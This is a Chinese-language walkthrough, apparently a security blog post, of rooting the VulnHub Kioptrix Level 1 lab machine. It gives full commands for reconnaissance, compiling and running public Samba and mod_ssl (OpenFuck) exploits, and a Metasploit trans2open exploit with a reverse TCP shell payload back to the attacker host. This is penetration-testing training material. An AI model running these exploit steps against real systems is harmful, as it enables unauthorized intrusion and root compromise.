Toxic80l 狐狸说安全 2024-03-05 11:15 山东
0x01 靶机介绍靶机下载地址: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
0x02 侦察端口探测 首先使用 nmap 进行端口扫描 nmap -p- -sV -sC -A 192.168.0.106 -oA nmap_kioptrix-1
扫描结果显示目标开放了22、80、111、139、443和1024端口 80端口
目录扫描 使用 gobuster 进行目录扫描,成功发现目录manual、usage、mrtg
- gobuster dir -u http://192.168.0.106 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
复制代码
访问manual目录存在目录遍历
访问usage目录为网站的使用情况
访问mrtg目录为 MRTG 且版本为2.9.6
0x03 上线[root] 信息收集使用 MSF 扫描 Samba 版本为2.2.1a msfconsolemsf > use auxiliary/scanner/smb/smb_versionmsf > set RHOSTS 192.168.0.106msf > run
使用 searchsploit 查找相关漏洞,成功发现存在多个远程代码执行漏洞
- searchsploit samba 2.2
- cp /usr/share/exploitdb/exploits/multiple/remote/10.c ./
复制代码
Samba远程代码执行编译并执行 EXP,成功拿到 root 用户权限
- gcc 10.c -o exp
- ./exp -b 0 -v 192.168.0.106
复制代码
Samba trans2open远程溢出MSF利用使用 MSF 进行漏洞利用,成功拿到root权限
- msfconsole
- msf > use exploit/linux/samba/trans2open
- msf > set rhosts 192.168.0.106
- msf > set lhost 192.168.0.109
- msf > set payload linux/x86/shell/reverse_tcp
- msf > run
复制代码
编译执行复制 EXP 至本地目录
- searchsploit trans2open
- cp /usr/share/exploitdb/exploits/unix/remote/22469.c ./
复制代码
编译并执行 EXP,成功拿到 root 用户权限
- gcc 22469.c -o exp1
- ./exp1 -t 192.168.0.106
复制代码
Apache mod_ssl 远程溢出
使用 OpenFuck 前提需安装libssl-dev库
- git clone https://github.com/heltonWernik/OpenFuck.git
- apt-get install libssl-dev
复制代码
编译 OpenFuck 并运行,提示不同系统所支持的偏移量
- gcc -o OpenFuck OpenFuck.c -lcrypto
- ./OpenFuck
复制代码
靶机的 Apache 版本为1.3.20,操作系统为 RedHat,因此偏移量可使用0x6a和0x6b
- ./OpenFuck 0x6a 192.168.0.106 -c 40
- ./OpenFuck 0x6b 192.168.0.106 -c 50
复制代码
|